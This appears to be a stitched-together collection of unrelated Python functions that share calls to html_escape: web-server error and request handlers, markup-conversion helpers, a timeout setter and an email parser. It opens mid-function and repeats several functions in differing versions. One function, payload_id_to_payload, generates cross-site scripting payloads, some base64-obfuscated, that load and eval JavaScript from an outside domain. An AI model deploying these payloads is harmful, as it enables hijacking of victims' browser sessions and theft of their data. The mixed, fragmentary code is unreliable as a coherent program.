self.cprofile_tree[fun]['callcount'],
self.cprofile_tree[fun]['totaltime'])
heading = html_escape(heading)
heading = "<h3>" + heading + "</h3>"
heading += ("<p>From file: " +
html_escape(fun.co_filename) + "</p>")
except AttributeError:
heading = "<h3>" + html_escape(fun) + "</h3>"
self.value_heading = heading
def handle_error(self, status=500, message=None,
payload=None, exc=None, headers=None, reason=None):
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection."""
if self.access_log:
now = self._loop.time()
try:
if self.transport is None:
# client has been disconnected during writing.
return
if status == 500:
self.log_exception("Error handling request")
try:
if reason is None or reason == '':
reason, msg = RESPONSES[status]
else:
msg = reason
except KeyError:
status = 500
reason, msg = '???', ''
if self.debug and exc is not None:
try:
tb = traceback.format_exc()
tb = html_escape(tb)
msg += '<br><h2>Traceback:</h2>\n<pre>{}</pre>'.format(tb)
except:
pass
html = DEFAULT_ERROR_MESSAGE.format(
status=status, reason=reason, message=msg).encode('utf-8')
response = Response(
self.writer, status, close=True, loop=self._loop)
response.add_header(hdrs.CONTENT_TYPE, 'text/html; charset=utf-8')
response.add_header(hdrs.CONTENT_LENGTH, str(len(html)))
response.add_header(hdrs.DATE, self._time_service.strtime())
if headers is not None:
for name, value in headers:
response.add_header(name, value)
response.send_headers()
response.write(html)
# disable CORK, enable NODELAY if needed
self.writer.set_tcp_nodelay(True)
yield from response.write_eof()
if self.access_log:
self.log_access(
message, None, response, self._loop.time() - now)
finally:
self.keep_alive(False)
def handle_request(self, message, payload):
self._manager._requests_count += 1
if self.access_log:
now = self._loop.time()
request = self._request_factory(message, payload, self)
self._request = request
try:
try:
resp = yield from self._handler(request)
except HTTPException as exc:
resp = exc
except Exception as exc:
msg = "<h1>500 Internal Server Error</h1>"
if self.debug:
try:
tb = traceback.format_exc()
tb = html_escape(tb)
msg += '<br><h2>Traceback:</h2>\n<pre>'
msg += tb
msg += '</pre>'
except: # pragma: no cover
pass
else:
msg += "Server got itself in trouble"
msg = ("<html><head><title>500 Internal Server Error</title>"
"</head><body>" + msg + "</body></html>")
resp = HTTPInternalServerError(text=msg,
content_type='text/html')
self.logger.exception(
"Error handling request",
exc_info=exc)
yield from resp.prepare(request)
yield from resp.write_eof()
finally:
resp._task = None
# notify server about keep-alive
# assign to parent class attr
self._keepalive = resp._keep_alive
# Restore default state.
# Should be no-op if server code didn't touch these attributes.
self.writer.set_tcp_cork(False)
self.writer.set_tcp_nodelay(True)
# log access
if self.access_log:
self.log_access(message, None, resp, self._loop.time() - now)
# for repr
self._request = None
def text2html(txt):
txt = txt.strip()
if not txt:
return ''
def fill_link(match):
return '<a href="{0}" target_="_blank">{0}</a>'.format(match.group())
htm = html_escape(txt)
htm = link_re.sub(fill_link, htm)
htm = '<pre>%s</pre>' % htm
return htm
def payload_id_to_payload( payload_id, payload_token ):
js_attrib_js = 'var a=document.createElement("script");a.src="https://' + settings["domain"] + '/' + payload_token + '";document.body.appendChild(a);'
if payload_id == "generic_script_tag_payload":
return "\"><script src=https://" + settings["domain"] + '/' + payload_token + "></script>"
elif payload_id == "image_tag_payload":
return "\"><img src=x id=" + html_escape( base64.b64encode( js_attrib_js ) ) + " onerror=eval(atob(this.id))>";
elif payload_id == "javascript_uri_payload":
return "javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'https://" + settings["domain"] + '/' + payload_token + "\\';document.body.appendChild(a)')";
elif payload_id == "input_tag_payload":
return "\"><input onfocus=eval(atob(this.id)) id=" + html_escape( base64.b64encode( js_attrib_js ) ) + " autofocus>";
elif payload_id == "source_tag_payload":
return "\"><video><source onerror=eval(atob(this.id)) id=" + html_escape( base64.b64encode( js_attrib_js ) ) + ">";
elif payload_id == "srcdoc_tag_payload":
return "\"><iframe srcdoc=\"<script>var a=parent.document.createElement("script");a.src="https://" + settings["domain"] + '/' + payload_token + "";parent.document.body.appendChild(a);</script>\">";
elif payload_id == "xhr_payload":
return '<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//' + settings["domain"] + '/' + payload_token + '");a.send();</script>'
elif payload_id == "getscript_payload":
return '<script>$.getScript("//' + settings["domain"] + '/' + payload_token + '")</script>'
else:
return "\"><script src=https://" + settings["domain"] + '/' + payload_token + "></script>"
def html_ify(text):
''' convert symbols like I(this is in italics) to valid HTML '''
t = html_escape(text)
t = _ITALIC.sub("<em>" + r"\1" + "</em>", t)
t = _BOLD.sub("<b>" + r"\1" + "</b>", t)
t = _MODULE.sub(module_to_html, t)
t = _URL_W_TEXT.sub("<a href='" + r"\2" + "'>" + r"\1" + "</a>", t)
t = _URL.sub("<a href='" + r"\1" + "'>" + r"\1" + "</a>", t)
t = _CONST.sub("<code>" + r"\1" + "</code>", t)
return t
def escaped_with_field_highlighted(form_html, field_name):
"""
Return escaped HTML source code suitable for displaying;
fields with name==field_name are highlighted.
"""
form = load_html(form_html)
for elem in form.xpath('.//*[@name="{}"]'.format(field_name)):
add_text_before(elem, '__START__')
add_text_after(elem, '__END__')
text = html_tostring(form)
text = html_escape(text).replace('__START__', '<span style="font-size:large;color:#000">').replace('__END__', '</span>')
return text
def _setTimeout(self, timeout_mins, period_secs):
if not isinstance(timeout_mins, int):
raise TypeError(
(html_escape(str(timeout_mins)), "Must be integer"))
if not isinstance(period_secs, int):
raise TypeError((html_escape(str(period_secs)), "Must be integer"))
timeout_secs = timeout_mins * 60
# special-case 0-minute timeout value by ignoring period
if timeout_secs != 0:
if period_secs == 0:
raise ValueError('resolution cannot be 0')
if period_secs > timeout_secs:
raise ValueError(
'resolution cannot be greater than timeout '
'minutes * 60 ( %s > %s )' % (period_secs, timeout_secs)
)
# we need the timeout to be evenly divisible by the period
if timeout_secs % period_secs != 0:
raise ValueError(
'timeout seconds (%s) must be evenly divisible '
'by resolution (%s)' % (timeout_secs, period_secs)
)
# our timeout secs is the number of seconds that an item should
# remain unexpired
self._timeout_secs = timeout_secs
# our _period is the number of seconds that constitutes a timeslice
self._period = period_secs
# timeout_slices == fewest number of timeslices that's >= timeout_secs
self._timeout_slices = int(
math.ceil(float(timeout_secs) / period_secs)
)
def handle_error(self, status=500, message=None,
payload=None, exc=None, headers=None, reason=None):
"""Handle errors.
Returns http response with specific status code. Logs additional
information. It always closes current connection."""
now = self._loop.time()
try:
if self._request_handler is None:
# client has been disconnected during writing.
return ()
if status == 500:
self.log_exception("Error handling request")
try:
if reason is None or reason == '':
reason, msg = RESPONSES[status]
else:
msg = reason
except KeyError:
status = 500
reason, msg = '???', ''
if self.debug and exc is not None:
try:
tb = traceback.format_exc()
tb = html_escape(tb)
msg += '<br><h2>Traceback:</h2>\n<pre>{}</pre>'.format(tb)
except:
pass
html = DEFAULT_ERROR_MESSAGE.format(
status=status, reason=reason, message=msg).encode('utf-8')
response = aiohttp.Response(self.writer, status, close=True)
response.add_headers(
('CONTENT-TYPE', 'text/html; charset=utf-8'),
('CONTENT-LENGTH', str(len(html))))
if headers is not None:
response.add_headers(*headers)
response.send_headers()
response.write(html)
# disable CORK, enable NODELAY if needed
self.writer.set_tcp_nodelay(True)
drain = response.write_eof()
self.log_access(message, None, response, self._loop.time() - now)
return drain
finally:
self.keep_alive(False)
def html_ify(text):
''' convert symbols like I(this is in italics) to valid HTML '''
if not isinstance(text, string_types):
text = to_text(text)
t = html_escape(text)
t = _ITALIC.sub(r"<em>\1</em>", t)
t = _BOLD.sub(r"<b>\1</b>", t)
t = _MODULE.sub(r"<span class='module'>\1</span>", t)
t = _URL.sub(r"<a href='\1'>\1</a>", t)
t = _LINK.sub(r"<a href='\2'>\1</a>", t)
t = _CONST.sub(r"<code>\1</code>", t)
t = _RULER.sub(r"<hr/>", t)
return t.strip()
def _parseMessage(msg):
res = {
'payload': msg.get_payload()
}
if msg.get_content_maintype() == 'text':
enc = msg.get_content_charset()
if enc is None:
enc = 'ASCII'
res['text'] = msg.get_payload(None, True).decode(enc)
html = html_escape(res['text'])
html = re.sub('https?://([a-zA-Z.0-9/\-_?;=]|&)+', lambda m: '<a href="' + m.group(0) + '">' + m.group(0) + '</a>', html)
res['html'] = html
else:
res['html'] = '[attachment]'
return res
